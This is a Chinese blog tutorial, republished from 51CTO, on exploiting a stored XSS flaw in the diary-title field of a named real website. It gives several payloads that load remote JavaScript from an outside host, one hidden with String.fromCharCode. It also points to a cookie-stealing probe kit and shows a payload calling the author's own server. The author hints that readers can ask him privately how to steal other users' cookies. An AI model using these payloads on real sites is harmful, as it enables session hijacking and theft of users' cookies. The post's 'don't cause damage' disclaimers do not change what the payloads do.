XSS漏洞实例利用

简介:

环境:

        window 7 64位一台

        火狐浏览器就位

        外网云服务器一枚(我自己买的...)

        可XSS网站一匹

        获取Cookie的JS代码一套

        

好了,以上就是需要准备的东西,没有的外网云服务器(外网IP)的可以百度一下XSS利用的公开平台,自己研究下怎么用(我的服务器就不公开了,太渣了,只是用来做实验没法公开...)


现在我们开始一步一步的进行XSS漏洞利用


0x00  ....biubiubiu....偶遇可X的站点

(这里就把站点公开了,同学们可以自己学习测试下,请不要搞破坏,防止从 ```XSS入门到派出所```)

1
2
#需要注册一个账号,可X点位于写日记部分
http: //www.vbao100.com/


0x01 开始测试是否存在可X(正常思路啊)

1
2
3
4
#经典测试代码
<script>alert(1)</script>
#猥琐版测试代码(需要在火狐插件firebug中查看隐蔽性好不易被管理员发现相对弹窗)
console.log(1)


0x02 啊啊啊...弹窗了(确定存在XSS)

在写日记的标题处插入测试代码点击预览(表(不要)发布...发布了管理员会审核)

wKiom1eLVEfwlhuPAAC8ee5E7fY264.png-wh_50


0x03 确定存在XSS了...可以利用了...嘿嘿嘿....

再次说一下上次说到的XSS paylaod

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<script src= 'http://b.ioio.pub/xss/probe.js' </script>
 
<img src=x
onerror= "s=createElement('script');body.appendChild(s);s.src='http://
b.ioio.pub/xss/probe.js'" ;>
 
<svg onload=s=createElement( 'script' );body.appendChild(s);s.src='http: //
b.ioio.pub/xss/probe.js>
 
<svg onload=
eval(String.fromCharCode(115,61,99,114,101,97,116,101,69,108,101,109,
101,110,116,40,39,115,99,114,105,112,116,39,41,59,98,111,100,121,46,9
7,112,112,101,110,100,67,104,105,108,100,40,115,41,59,115,46,115,114,
99,61,39,104,116,116,112,58,47,47,98,46,105,111,105,111,46,112,117,98,
47,120,115,115,47,112,114,111,98,101,46,106,115)) >

当触发以上某一个标签会从远程加载JS代码,这是你可用通过修改远程的JS代码来实现不同的功能。

大家也看到上面的连接那肯定不是我的呀....来自大神的JS获取COOKIE 的代码

分享一下:

1
https: //github.com/evilcos/xssprobe

主要包含三个文件,在这里给大家说下这三个脚本是干什么用的就不具体介绍代码含义了。

第一个:

1
2
3
4
5
这个脚本就是需要远程加载的JS获取Cookie的代码(可以下载一下放到自己的服务器上或XSS平台)
里面有一段需要修改的地方
http_server = "
 
#  这段需要修改为自己服务器的地址和接受数据的PHP文件

第二个:

1
2
这个就是上面提到的需要接受数据的PHP文件这个文件不需要修改。
其作用是将接受的数据写入到第三个文件中。

第三个:

1
2
这是就是你获取cookie后显示cookie的地方。通过第一文件获取到cookie然后传个第二个文件由第二个
文件写入到这个文件中显示出来。

0x04 开始利用了...构造利用代码

1
<script src= 'http://xx.xx.xx.xx/xsstest.js'  /> (xx.xx.xx.xx就是我的云服务器)

构造好了,然后测试一下成功否....测试我自己申请的账号了....(怎么获取别人的cookie就靠你自己想了,你要私信我就告诉你....)

ok...现在看一下效果图....


wKiom1eLWyWTW_PsAAHLMOtU7Vo311.png-wh_50

现在我们就成功获取到我自己的Cookie了....O(∩_∩)O~

(再次申明,请同学们不要搞破坏,仅供测试使用......)




本文转自 nw01f 51CTO博客,原文链接:http://blog.51cto.com/dearch/1827201,如需转载请自行联系原作者

相关文章
|
2月前
|
存储 安全 JavaScript
26、XSS漏洞介绍
26、XSS漏洞介绍
19 0
|
2月前
|
存储 安全 JavaScript
小课堂 -- XSS漏洞介绍
小课堂 -- XSS漏洞介绍
18 0
|
3月前
|
存储 开发框架 安全
如何处理预防XSS漏洞攻击问题
防止XSS攻击需要从多个方面入手,包括输入验证和过滤、输出编码、设置正确的HTTP头部、使用最新的安全框架和库、定期进行安全审计和漏洞扫描以及培训和意识提升等。只有综合运用这些措施,才能有效地防止XSS攻击,保护网站和用户的安全。
|
6月前
|
存储 安全 JavaScript
渗透攻击实例-xss跨站脚本攻击
渗透攻击实例-xss跨站脚本攻击
|
9月前
|
安全 前端开发 JavaScript
信息服务上线渗透检测网络安全检查报告和解决方案2(安装文件信息泄漏、管理路径泄漏、XSS漏洞、弱口令、逻辑漏洞、终极上传漏洞升级)
信息服务上线渗透检测网络安全检查报告和解决方案2(安装文件信息泄漏、管理路径泄漏、XSS漏洞、弱口令、逻辑漏洞、终极上传漏洞升级)
130 0
|
2月前
|
存储 安全
第二轮学习笔记:XSS跨站脚本漏洞
第二轮学习笔记:XSS跨站脚本漏洞
24 0
|
2月前
|
安全 开发工具 git
xss漏洞工具 -- xsser
xss漏洞工具 -- xsser
55 0
|
5月前
|
SQL 安全 JavaScript
互联网并发与安全系列教程(05) - 常见的Web安全漏洞(XSS攻击、SQL注入、防盗链)
互联网并发与安全系列教程(05) - 常见的Web安全漏洞(XSS攻击、SQL注入、防盗链)
60 0
|
8月前
|
安全 JavaScript 前端开发
|
8月前
|
SQL 存储 安全
【网络安全】护网系列-web漏洞(SQl、RCE、XSS)
【网络安全】护网系列-web漏洞(SQl、RCE、XSS)
349 0